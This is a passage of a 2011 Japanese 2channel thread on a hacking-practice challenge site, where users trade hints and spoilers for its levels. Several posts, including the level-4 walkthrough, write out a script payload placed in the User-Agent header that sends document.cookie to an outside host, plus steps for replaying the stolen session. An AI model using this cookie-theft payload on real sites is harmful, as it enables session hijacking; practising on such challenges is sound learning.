前から思ってたんだが、英数字と下線のみなのにどうして-は蹴られないんだ?
全てのLvでいえるんだが。
841名無しさん@お腹いっぱい。:2011/02/25(金) 05:00:24.91
フィールド名もサニタイズされてるっぽくてむりぽ
842名無しさん@お腹いっぱい。:2011/02/25(金) 05:02:21.47
>>840
改行も蹴られないっぽい
でも改行と-にしたら蹴られた
843名無しさん@お腹いっぱい。:2011/02/25(金) 05:13:12.41
スクリプトが実行可能なようですってちょっと意味が分からないんだけど
844名無しさん@お腹いっぱい。:2011/02/25(金) 05:52:09.08
>>838
それどうやって出した?
845名無しさん@お腹いっぱい。:2011/02/25(金) 06:02:14.51
>>844
firebugとかで、htmlをこんな感じにしてpostした
別のLvでも再現できるから、これではなさそう

「The input field '' was not expected.」
<td><input type="password" name="password" value=""/></td>

<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password2" value=""/></td>

「文字を与えてください」
<td><input type="password" name="password" value=""/></td>

<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password" value=""/></td>
846名無しさん@お腹いっぱい。:2011/02/25(金) 06:05:34.73
フィールド自体消去するとMissingValueとか出るけど、
内部の情報見たり他人のデータ掠め取るのには到底使えない。ふむ
847名無しさん@お腹いっぱい。:2011/02/25(金) 06:06:08.66
>>721
それじゃログインできなかった人しかこないよ
848名無しさん@お腹いっぱい。:2011/02/25(金) 06:29:03.80
>>847
じゃあどうすりゃいいのよ
849名無しさん@お腹いっぱい。:2011/02/25(金) 06:34:08.15
わからん
850名無しさん@お腹いっぱい。:2011/02/25(金) 06:34:40.79
クイズの答えを人に聞くんじゃねぇ
851名無しさん@お腹いっぱい。:2011/02/25(金) 06:41:46.45
Lv4は他鯖必要ないってんだからdocument.location使う意味ないよね。
コレって別のアドに飛ばすもんでしょ?
とするとどうすりゃいいのさ・・・
852名無しさん@お腹いっぱい。:2011/02/25(金) 06:42:17.14
いるけどいらない
853名無しさん@お腹いっぱい。:2011/02/25(金) 07:11:39.75
ニョキってなんだよー!
どうやって出すんだよー!
854名無しさん@お腹いっぱい。:2011/02/25(金) 07:21:28.62
ニョキはもう答えだから、出し方教えたらい見ないでしょ
855名無しさん@お腹いっぱい。:2011/02/25(金) 07:31:45.65
726の言ってるなりすましってのはやっぱりfoobarのsessionidとかってはなしなのか?
856名無しさん@お腹いっぱい。:2011/02/25(金) 07:40:40.03
>>855
やってみたら分かる
857名無しさん@お腹いっぱい。:2011/02/25(金) 07:49:56.02
なんか色々いじいじしてたら
Missing value
っつてエラーが出た
普通は英数と数字と〜とか入力してくださいってエラーだからちょっと前進なのかしら
858名無しさん@お腹いっぱい。:2011/02/25(金) 08:01:51.95
自サバを使うようなスクリプトが正解だけど自サバを実際に立てる必要は無いって事?
859名無しさん@お腹いっぱい。:2011/02/25(金) 08:04:57.67
Lv4が一番するっと通った気がするのだけどそんなにややこしかったかな
860名無しさん@お腹いっぱい。:2011/02/25(金) 08:06:36.48
>>857
俺もそれ思ったけど、Lv1から出るエラーだからあってるのか迷ってる。
861名無しさん@お腹いっぱい。:2011/02/25(金) 08:14:05.39
lv4のニョキの送信方法のヒントくれ
自分が使ってるので書き換えてアクセスしても通らない
862名無しさん@お腹いっぱい。:2011/02/25(金) 08:17:38.43
>>861
書き換えるってか追加するだけでおk
名前まで丁寧に出てるしな
863名無しさん@お腹いっぱい。:2011/02/25(金) 08:19:24.13
実際に立てる必要無いってコトはnetfireの方にクッキー盗聴するスクリプトがあるのかね。
ユーザーエージェントにlocation云々書いてfooさんアクセスを待つ。
んでアクセスしたんだろうなーってところで盗聴スクリプトからfooのsessionidをコピる
sessionidコピったら自分のidを書き換えてpost出来るソフト化なんか使ってアクセス
(゚д゚)ウマー

・・・って事なのかな
たしかにコレなら必要だけど必要じゃないってのもハマってると思うんだけどな。
864名無しさん@お腹いっぱい。:2011/02/25(金) 08:21:44.41
>>863
大体あってる
865名無しさん@お腹いっぱい。:2011/02/25(金) 08:22:19.20
>>862
いまいち理解できてないな俺
これはsessionidだけどsessionidじゃないんだよな?
ソフト変えてみようかな
866名無しさん@お腹いっぱい。:2011/02/25(金) 08:24:41.74
だからなんでネタバレするん?それもうヒントじゃねーじゃん。
アホなの?自己中なの?
867名無しさん@お腹いっぱい。:2011/02/25(金) 08:32:34.37
javascript知らないしヒントの域にすら入ってないから心配すんあw
868名無しさん@お腹いっぱい。:2011/02/25(金) 08:35:38.79
UAを
<script>document.location="http://hackme.netfire.jp/?cookie="+document.cookie</script>
にしてIDとパス適当に打ってログインしても普通に失敗してなんの動きも見せないんだよね。
http://hackme.netfire.jp/?cookie=
にアクセスしても意味ないしw
869名無しさん@お腹いっぱい。:2011/02/25(金) 08:43:27.59
Lv4はほぼ答えが出てるから、これ以上ここで考察しても意味ない
あとは自分で考えろ
870名無しさん@お腹いっぱい。:2011/02/25(金) 08:53:33.53
まあ確かにlv4はちょっとイラッとくるのはわかる。
何時間無駄にしたんだよって感じ。
871名無しさん@お腹いっぱい。:2011/02/25(金) 09:02:09.05
Lv4、こんだけ試したのにニョキってのやらがでないなら
俺はもう製作者の意図(笑)を理解することは一生できんわ、諦めよう
872名無しさん@お腹いっぱい。:2011/02/25(金) 09:32:55.60
> @Netfire_Inc: Lv4の合格判定を修正しました。

少し緩くなったっぽいな。今まで失敗してた人も多分これで通ると思う
873名無しさん@お腹いっぱい。:2011/02/25(金) 09:40:54.83
ブラウザ使わずにずっとPHPからリクエスト投げてたせいでニョキを見落としてたわ…
874名無しさん@お腹いっぱい。:2011/02/25(金) 09:44:05.21
(Lv4) 称号:ハッカー の方々
総勢100人

ランキング省略されたな。おつかれ
875名無しさん@お腹いっぱい。:2011/02/25(金) 10:05:09.65
Lv5がさっぱりわからねーよ。
876名無しさん@お腹いっぱい。:2011/02/25(金) 10:05:49.66
>>873
うわぁ、おれperl。
ブラウザでやり直しか・・・
877名無しさん@お腹いっぱい。:2011/02/25(金) 10:07:20.16
ニョキってまさかポップアップ?
ポップアップブロックしてたら永遠にミリなの??

違うならいいけど。
878名無しさん@お腹いっぱい。:2011/02/25(金) 10:09:36.30
>>877
jqueryだから気にすんな
879名無しさん@お腹いっぱい。:2011/02/25(金) 10:16:27.43
>>876
ログイン履歴の少し下のあたりを見とくといいよ
880名無しさん@お腹いっぱい。:2011/02/25(金) 10:55:37.85
寝ておきて同じスクリプト試したら2秒でできた・・・
なんということだ
881名無しさん@お腹いっぱい。:2011/02/25(金) 11:00:12.04
>>880
俺も・・・。中の人がLv4の合格判定したって言ってるけど関係あるのかな。
それか>>828か。
882名無しさん@お腹いっぱい。:2011/02/25(金) 11:06:31.85
総当たりさせろよ〜w
あっという間にBANされて笑うわ
883名無しさん@お腹いっぱい。:2011/02/25(金) 11:07:38.47
ぶっちゃけLv2〜Lv4って手法が違うだけで難易度似たようなもんだよね
884名無しさん@お腹いっぱい。:2011/02/25(金) 11:10:05.96
>>883
判定基準が中の人次第だからね
lv4とか昨日はダメだったけど今日やったらするっと行ける時点でどうにも・・・
885名無しさん@お腹いっぱい。:2011/02/25(金) 11:11:26.01
Lv2 パターンは少ないが製作者の意図を汲まないと無理
Lv3 一般的
Lv4 パターンも多く製作者の意図を汲まないと無理→ちょいゆるめになった

結構違う
886名無しさん@お腹いっぱい。:2011/02/25(金) 11:14:20.15
>>885
新しいLv2は製作者の意図もなにもない、一般的な奴になったよ
新しいLv4も、「これが通るのにあれが通らないの?」っていうのは残るけど一番オーソドックスな方法で通る
887名無しさん@お腹いっぱい。:2011/02/25(金) 11:17:31.34
Lv5ってさ、
「脆弱性なんか作ってないけどアカウントは作ってあるから各々頑張って突破してみ?」ってことなんじゃね?
888名無しさん@お腹いっぱい。:2011/02/25(金) 11:27:10.78
Lv5わかんねーよ! 一応HTTPヘッダも見たけど怪しいところなし。

--> HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Date: Fri, 25 Feb 2011 02:23:29 GMT
Server: Google Frontend
Content-Length: 1933
889名無しさん@お腹いっぱい。:2011/02/25(金) 11:27:28.53
Lv4
にょきの情報をどう使えばいいのかわからん
ヘッダに書くんじゃないの?
890名無しさん@お腹いっぱい。:2011/02/25(金) 11:28:32.54
>>889
それが解らないなら実力がLv4に達してない
891名無しさん@お腹いっぱい。:2011/02/25(金) 11:28:38.23
>>887
一応ヒントっぽいものは見つけたけどさ。
これ、どうやって使えって言うんだろう?
892名無しさん@お腹いっぱい。:2011/02/25(金) 11:30:04.98
LV4そろそろネタバレしてもいいかな?
893名無しさん@お腹いっぱい。:2011/02/25(金) 11:34:17.23
もういいんじゃねw
宣伝は終わったww
結局lv5で自分とこの製品チェックしたいんだよ。
894名無しさん@お腹いっぱい。:2011/02/25(金) 11:34:54.02
>>891
ヒントってどんなやつ??
895名無しさん@お腹いっぱい。:2011/02/25(金) 11:36:16.94
lv3の時は「バカが」とおもったけど
lv4の時は言うやつ居ないんじゃ・・・ないだろうかw
896名無しさん@お腹いっぱい。:2011/02/25(金) 11:37:52.52
>>894
Lv5のURLって「/Lv5/login」じゃん?
Lv5のだけ何故か末尾に/をつけても404にならないんだよね。
Lv4以下で試したら全部404になった。
これってURLを弄れってことなんじゃないかな?って思ってさ。
897名無しさん@お腹いっぱい。:2011/02/25(金) 11:38:51.45
Lv4、最初のコードの判定はちょっと酷かったかもしれないけど
にょきが出た後はヒントいらないだろ
それが解らないならそこまで来れたのがおかしい
898名無しさん@お腹いっぱい。:2011/02/25(金) 11:40:22.23
自分のをにょきのに書き換えてsendしてもloginに戻されるぞ・・・
どういう事なの
899名無しさん@お腹いっぱい。:2011/02/25(金) 11:40:59.92
>>898
同じことが少し上に出てるぞ。
900名無しさん@お腹いっぱい。:2011/02/25(金) 11:44:31.70
>>896
あー、本当だ。どっちでも通るね。
しかし、確かにこれをどう判断するかは難しいな。
901名無しさん@お腹いっぱい。:2011/02/25(金) 11:48:48.29
あー、書き換えじゃなくて追加か。
なるほどと思ったありがとう
おかげでLv5です
902名無しさん@お腹いっぱい。:2011/02/25(金) 11:49:50.67
中の人が「人数増えたし、そろそろLv5破られるかな?」と言っておる。
ってことは、一応脆弱性はちゃんと用意されてるって事なのかな。
903名無しさん@お腹いっぱい。:2011/02/25(金) 11:52:20.35
LV5クリア。また理不尽な問題だったぜ
904名無しさん@お腹いっぱい。:2011/02/25(金) 11:53:45.88
>>903
ん、ランキングに表示されてませんが?
905名無しさん@お腹いっぱい。:2011/02/25(金) 11:54:40.84
Lv4昨日やってだめだったのが通った…
にょきっも笑えねぇよ…
906名無しさん@お腹いっぱい。:2011/02/25(金) 11:58:00.76
>>904
おかしいな、バグですかね
907名無しさん@お腹いっぱい。:2011/02/25(金) 11:58:50.24
げー。昨日ダメだったの一発で通ったよLv4。
昨日までの正解はどんなのだったんだろう。もはや自力じゃ知るすべがない。
908名無しさん@お腹いっぱい。:2011/02/25(金) 11:59:22.33
そろそろLV4の正解も晒そうかな
909名無しさん@お腹いっぱい。:2011/02/25(金) 12:00:50.54
ってかさ・・・・なんでもない。
910名無しさん@お腹いっぱい。:2011/02/25(金) 12:01:37.07
>>908
ありのままにどうぞw
911名無しさん@お腹いっぱい。:2011/02/25(金) 12:01:38.69
そこまでして構ってほしいの?
912名無しさん@お腹いっぱい。:2011/02/25(金) 12:02:01.72
Lv4 までは正解できないまでも、ざっくり予想はつく範囲だったのに、Lv5 は本当に
取り付くしまも無いな。
913名無しさん@お腹いっぱい。:2011/02/25(金) 12:04:25.10
>>908
やめてーーー><
914名無しさん@お腹いっぱい。:2011/02/25(金) 12:04:51.14
お前ら情報戦は弱いんだな
「さらそうかな」と言ってる奴は解けてない奴
晒したいけど我慢してる奴に「どうせ出るなら俺が晒せば賞賛は俺のもの」と思わせるのが狙い
915名無しさん@お腹いっぱい。:2011/02/25(金) 12:04:52.41
>>908
もうすでに晒されてるようなもんだし、別にいらないんじゃね?
916名無しさん@お腹いっぱい。:2011/02/25(金) 12:06:19.67
情報戦とかいいから改定前の正解晒せよ
917名無しさん@お腹いっぱい。:2011/02/25(金) 12:10:24.20
/Lv6/ だと /Lv5 に転送されるけど、
/Lv7/ だと 404 になるから、一応Lv6は存在するのかもしれない・・
918名無しさん@お腹いっぱい。:2011/02/25(金) 12:12:06.93
改定後の正解知ってるなら
改定前の正解とか簡単に予想つくんでは
919名無しさん@お腹いっぱい。:2011/02/25(金) 12:13:55.85
つーかcookieのセットすらできない連中がすでにLv4まできてるとか
凄まじいな
920名無しさん@お腹いっぱい。:2011/02/25(金) 12:14:24.93
>>916
改定後もそのまま正解だから晒せねーよ

まあ問題が「>>916のレスを表示せよ」で
要求したURLが
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916- では駄目で
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916 のみが正解だった
理由は916-の方は分散して微妙に見難くなるから
まあその程度の理不尽
921名無しさん@お腹いっぱい。:2011/02/25(金) 12:17:19.36
いつの間にやらスレが埋まりそうな感じだな。
922名無しさん@お腹いっぱい。:2011/02/25(金) 12:18:26.19
999にLV4の答えを書く
923名無しさん@お腹いっぱい。:2011/02/25(金) 12:21:07.04
じゃあLV5のヒント:javascriptエラーがある
924名無しさん@お腹いっぱい。:2011/02/25(金) 12:32:11.77
>>923
具体的にどこに?
925名無しさん@お腹いっぱい。:2011/02/25(金) 12:44:06.38
まぁLv4に関してはもう答え晒されてるようなもんだしそろそろどっかの誰かがまた「晒されてますよ?」
って中の人にいうんじゃないかと・・・w
926名無しさん@お腹いっぱい:2011/02/25(金) 12:47:42.02
>>922
早くかけよ
927名無しさん@お腹いっぱい:2011/02/25(金) 12:48:38.21
>>922
早くかけよ
928名無しさん@お腹いっぱい:2011/02/25(金) 12:49:00.44
>>922
早くかけよ
929名無しさん@お腹いっぱい:2011/02/25(金) 12:49:45.96
>>922
早くかけよ
930名無しさん@お腹いっぱい:2011/02/25(金) 12:50:17.79
>>922
早くかけよ
931名無しさん@お腹いっぱい。:2011/02/25(金) 12:50:33.07
ネタバレって規約違反じゃね?
932名無しさん@お腹いっぱい:2011/02/25(金) 12:50:41.67
>>922
早くかけよ
933名無しさん@お腹いっぱい:2011/02/25(金) 12:51:02.83
>>922
早くかけよ
934名無しさん@お腹いっぱい:2011/02/25(金) 12:51:32.03
>>922
早くかけよ
935名無しさん@お腹いっぱい。:2011/02/25(金) 12:51:52.67
中の人も「やめて><」って言ってるくらいだしなw
正直ただでさえ楽っていうか分かりやすくになったのにこれ以上分からんとか言ってるのは1から勉強しなおせレベル。
936名無しさん@お腹いっぱい。:2011/02/25(金) 12:52:39.54
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
937名無しさん@お腹いっぱい。:2011/02/25(金) 12:52:41.79
おい、あんまりいじめてやるなよw

埋め
938名無しさん@お腹いっぱい。:2011/02/25(金) 12:53:35.82
まだ>>999になってないぞ。早漏め
939名無しさん@お腹いっぱい。:2011/02/25(金) 12:53:44.20
あーLv5いけたかも。
940名無しさん@お腹いっぱい。:2011/02/25(金) 12:54:40.80
>>939
それらしいヒントとかあった?
941名無しさん@お腹いっぱい。:2011/02/25(金) 12:55:08.35
>>939
kwsk
942名無しさん@お腹いっぱい。:2011/02/25(金) 12:55:10.66
現在LV4総勢148人
↓増え続ける
943名無しさん@お腹いっぱい。:2011/02/25(金) 12:59:44.18
こんだネタバレあってわかんないのはそもそもxssとか名称だけしっててやってることは理解してないんだろうな
944名無しさん@お腹いっぱい。:2011/02/25(金) 13:00:11.30
やった、Lv4通ったー
昨日やって通らなかったはずのが通った
SQLインジェクションとかXSSとか名前だけ知ってる程度の知識だったけど、どういう仕組か理解できたわ
Lv3はUNIXすこし触ったことあったからすぐ理解できた

945名無しさん@お腹いっぱい。:2011/02/25(金) 13:02:16.45
Lv3についてはかなり初期の時点で誰かがディレクトリトラバーサルって単語漏らしたからググってクリアしたんだけど、あの人は全然叩かれないんだな
946名無しさん@お腹いっぱい。:2011/02/25(金) 13:03:01.82
ネタバレ起きてから合格しても同格とか思わないでほしいんで、その辺夜露死苦
947名無しさん@お腹いっぱい。:2011/02/25(金) 13:04:17.69
>>945
URLみたら誰でもすぐに思いつくことだからね。
あたり前のこととしてスルーされたんじゃね。
948名無しさん@お腹いっぱい。:2011/02/25(金) 13:09:14.95
あれみてディレクトリトラバーサルと思いつかないような奴は普通Lv3までいけないはずなんだよなww
tempとかUNIXそのまんまだし
949名無しさん@お腹いっぱい。:2011/02/25(金) 13:12:03.75
ディレクトリトラバーサルはネタバレとはいえない
レベルのすぐ分かることだな。

レベル4でネタバレになったのはUAに突っ込むというアイデアだ。
自力で「ウホッ」と気付いたやつは自負していいレベルだけど
ここまできてもクリアできてないやつはもう本筋から離れたレベル。
自分が一番よく分かってるだろうw
950名無しさん@お腹いっぱい。:2011/02/25(金) 13:12:09.27
>>948
突っ込んでほしいのか?
951名無しさん@お腹いっぱい。:2011/02/25(金) 13:13:19.27
やっぱ時系列は上から下としか思えない
952名無しさん@お腹いっぱい。:2011/02/25(金) 13:15:01.66
lv5ェ・・・
953名無しさん@お腹いっぱい。:2011/02/25(金) 13:19:17.50
今見たら157人がLv4クリア
流石にだいぶ増えたな
954名無しさん@お腹いっぱい。:2011/02/25(金) 13:20:35.54
俺がuser-agentって書いた時点では10人ぐらいだったのになぁ
955名無しさん@お腹いっぱい。:2011/02/25(金) 13:21:46.47
判定基準甘くなったからな・・・昨日ダメなのが今日は行けたし
956名無しさん@お腹いっぱい。:2011/02/25(金) 13:21:51.85
まぁ、所詮セキュ板の雑魚どものレベルなんてそんなもんだ
957名無しさん@お腹いっぱい。:2011/02/25(金) 13:23:00.68
>>955
そこらへんなんとかして欲しかったよな
958名無しさん@お腹いっぱい。:2011/02/25(金) 13:28:37.96
Lv2とLv4はそれぞれ2つか3つくらいのレベルに分けて
手法は同じでも
Lv2-easyはオーソドックスなパターン
Lv2-normalはちょっとひねったパターン
Lv2-hardは珍しいパターン
みたいにすればよかったのにね
これなら途中で判定基準変えたりして文句も言われなかったかも
959名無しさん@お腹いっぱい。:2011/02/25(金) 13:29:07.06
関係ないけどBackTrackのページの左側に勇気、力、決心って書いてあってワロタ
なんの意味があるんだろうか
960名無しさん@お腹いっぱい。:2011/02/25(金) 13:30:50.42
LV5は株式会社ネットファイアの製品netfire-v1の試験だな
961名無しさん@お腹いっぱい。:2011/02/25(金) 13:31:15.37
ランキングの称号が「ハッカーの方々」から「仮免許ハッカーの人」になってるw
962名無しさん@お腹いっぱい。:2011/02/25(金) 13:31:32.84
この会社、煽ってくるぞw
963名無しさん@お腹いっぱい。:2011/02/25(金) 13:32:25.31
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
ワロス
964名無しさん@お腹いっぱい。:2011/02/25(金) 13:33:02.56
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?

クソ吹いたwwww
むしろ判定基準がチートだと思うがww
965名無しさん@お腹いっぱい。:2011/02/25(金) 13:33:56.24
中途半端にスクリプト通らないからもうややこしい
って会社が煽るなよwww
966名無しさん@お腹いっぱい。:2011/02/25(金) 13:34:34.57
ネタバレ位想定できただろうにw、それで煽ってくるとかw
967名無しさん@お腹いっぱい。:2011/02/25(金) 13:34:45.56
ほんとだ、さっきまで
セキュリティ関係なら簡単かな?
みたいな感じのコメントだったのにwww
968名無しさん@お腹いっぱい。:2011/02/25(金) 13:38:00.62
これでまさかのlv5がランキングページ書き換えでした!とかだったらどうしよう・・・
969名無しさん@お腹いっぱい。:2011/02/25(金) 13:39:35.82
http://twitter.com/#!/passa/status/40993999892389888
ちょっと煽り過ぎた。反省。 #hackme
37秒前 twiccaから
970名無しさん@お腹いっぱい。:2011/02/25(金) 13:40:07.46
自鯖がいるようでいらない、sessionidなようでsessionidじゃない
971名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:31.68
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
に変わったw
972名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:33.19
■LV4のクリア方法(ネタバレ)

firefoxのアドオンにCS LiteとUser Agent Switcherをインストールします。
んで、User Agent Switcherで新しいUser Agent(以下UA)を作り、User Agentの項目に
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
と書きます。
そのUAに設定して適当なID・PASSでログインします。
すると左下にセッションIDを盗みました的なAJAXウインドウが出てきます。
盗んだセッションをCS Liteアドオンを使って自分のブラウザのクッキーに登録します。
そして戻るボタンをクリックするとクリアできます。
973名無しさん@お腹いっぱい:2011/02/25(金) 13:43:35.67
974名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:36.51
>>969
書き換わったw

「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。


どうせならクリア時に、お手本を公開すればいいのになぁ(特にlv4)
昨日と今日で判定基準変わってるんだし
975名無しさん@お腹いっぱい。:2011/02/25(金) 13:44:39.65
結局昨日の答えはなんだったのか気になる。
最後に解答例とか出してほしいな
976名無しさん@お腹いっぱい。:2011/02/25(金) 13:45:07.12
>>969
何だこの子素直
977名無しさん@お腹いっぱい:2011/02/25(金) 13:46:01.77
978名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:08.75
煽るくらいならもっと柔軟性を持った判定にしろよなー
979名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:28.11
かつてないほどセキュリティ板のアクセスが集中しております
980名無しさん@お腹いっぱい:2011/02/25(金) 13:48:57.15
だれか、lv2教えてくれ
981名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:36.12
>>980
SQLインジェクション
982名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:51.61
Lv2修正された?昨日よりやさしくなってるっぽいけど
983名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:20.11
今更LV2の答え教えても目立たないしな。
984名無しさん@お腹いっぱい:2011/02/25(金) 13:50:51.20
>>983
じゃ、おしえてくれ
985名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:59.63
煽る煽るw
社員2ch張り付きすぎだろw
986名無しさん@お腹いっぱい。:2011/02/25(金) 13:51:26.73
>>981
そこはスレ嫁でいいんだよ
もう散々書かれてるんだから
987名無しさん@お腹いっぱい。:2011/02/25(金) 13:52:02.20
そりゃここのスレは重要監視なんじゃね?
lv4も暫定停止フラグだなw
988名無しさん@お腹いっぱい。:2011/02/25(金) 13:52:34.99
本物のハッカーが163人もいるとか不自然だろ。
最初の2〜3人ぐらいが本物なんじゃね
989名無しさん@お腹いっぱい。:2011/02/25(金) 13:54:33.19
>>988
俺もそう思うわ。
一応、昨日クリアしたけど、その時点でもちらほらヒントが出てたしなあ。
990名無しさん@お腹いっぱい。:2011/02/25(金) 13:54:42.78
■LV4のクリア方法(ネタバレ)

おくれましたが公開です。
まずページを開きます。
Explororのアドレス欄に次の文を打ち込みます→javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
あとでメッセージが出てくるのでそれを読みます。
ほとんどそこまでいけばクリアですよー!
991名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:08.53
LV2合格者って1万人ぐらいいるのかな?
992名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:13.74
こんなことだけでハッカーかどうかなんてわからんだろ
993名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:28.55
判定が理不尽じゃなければ
Lv4までは解ける範囲だと思うけどなー
994名無しさん@お腹いっぱい:2011/02/25(金) 13:55:32.04
スレ読んでもわからん
995名無しさん@お腹いっぱい。:2011/02/25(金) 13:57:43.22
このサイトの公開初日にLv2クリアしてたの4人くらいだったな
その最初の4人はLv4でも名前あったからその人達は本当の知識と技術があるひとだな
996名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:17.04
>>994
諦めろ
997名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.63
クッキーの書き換えがわからん
その域に達していないらしい
lv3まではスイスイいけたんだが
webわかんね
998名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.62
LV4も再度やってみたけど、自分IPとdocument.cookieの文字が入ってれば
文法的に間違ってても正解になるみたいね
999名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:42.77
>>994
それはさすがに勉強不足なだけなんじゃ・・・。
1000名無しさん@お腹いっぱい。:2011/02/25(金) 13:59:47.46
1000
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。